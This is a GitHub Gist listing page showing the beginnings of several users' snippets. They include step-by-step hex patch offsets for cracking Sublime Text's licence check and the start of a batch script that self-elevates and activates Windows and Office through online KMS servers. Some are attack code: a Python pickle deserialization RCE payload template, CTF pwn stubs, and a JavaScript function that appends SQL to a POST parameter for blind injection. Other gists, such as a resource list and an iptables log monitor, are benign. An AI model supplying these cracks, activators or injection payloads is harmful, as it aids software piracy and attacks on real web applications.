Skip to content

Instantly share code, notes, and snippets.

@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active May 10, 2025 09:18
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)
@bhandarisaurav
bhandarisaurav / Online KMS Activator.cmd
Last active April 25, 2025 20:15
Activate Windows & Office for 180 Days with online KMS Servers. This script does not install any files in your system and it clears all the leftovers including kms server name after the Activation. For Successful Activation, Internet Must be connected.
@echo off
::::::::::::::::::::::::::::
set "params=Problem_with_elevating_UAC_for_Administrator_Privileges"&if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs"
fsutil dirty query %systemdrive% >nul 2>&1 && goto :GotPrivileges
:: The following test is to avoid infinite looping if elevating UAC for Administrator Privileges failed
If "%1"=="%params%" (echo Elevating UAC for Administrator Privileges failed&echo Right click on the script and select 'Run as administrator'&echo Press any key to exit...&pause>nul 2>&1&exit)
cmd /u /c echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "%~0", "%params%", "", "runas", 1 > "%temp%\getadmin.vbs"&cscript //nologo "%temp%\getadmin.vbs"&exit
:GotPrivileges
::::::::::::::::::::::::::::
color 1F
@spnow
spnow / pickle-payload.py
Created August 9, 2017 14:04 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys

Awesome Pwnable

Meta

  • awesome-ctf - A curated list of CTF frameworks, libraries, resources and softwares

Heap Exploitation

  • malloc.c - malloc() implementation in glib-2.23 (as found in Ubuntu 16.04.1 LTS)
  • how2heap - Awesome collection of various heap exploitation techniques
@spnow
spnow / stdio_ctf_trick.md
Created March 16, 2017 21:03
ctf trick for persist stdio in pwn
(python -c 'print "payload"'; cat -) | nc pwnable.url
(echo payload; cat) | ./pwnable

cat payload - | ./pwnable

@spnow
spnow / start.py
Created March 16, 2017 20:48 — forked from 0xPwny/start.py
Pwnable.tw - Start
#!/usr/bin/python
#ABDELJALIL NOUIRI
#author : [email protected]
from pwn import *
HOST = 'chall.pwnable.tw'
PORT = 10000
function pwn(params){
var http = new XMLHttpRequest();
var url = "/game/stats.php?action=psolve";
http.open("POST", url, false);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send("action=showpsolve&problem_no="+params+"-- -");
if(http.response.indexOf("you wanna be first") == -1){ return true; }
else return false;
}
@spnow
spnow / Challenges.md
Created January 9, 2017 14:03 — forked from yunga/Challenges.md
Puzzles, Riddles, Crackme, Programming Challenges...
@spnow
spnow / find.c
Created January 9, 2017 13:57 — forked from cvonkleist/find.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <openssl/evp.h>
// compile with: gcc -lssl find.c
@spnow
spnow / iptables_mysql.py
Created January 5, 2017 01:11 — forked from songmw90/iptables_mysql.py
Monitor mysql-error.log / added iptables to block ip
#!/usr/bin/env python
# -*- coding: utf8 -*-
import re
from subprocess import call
path = "/var/log/mysql/"
log = "error.log"
logContents = ""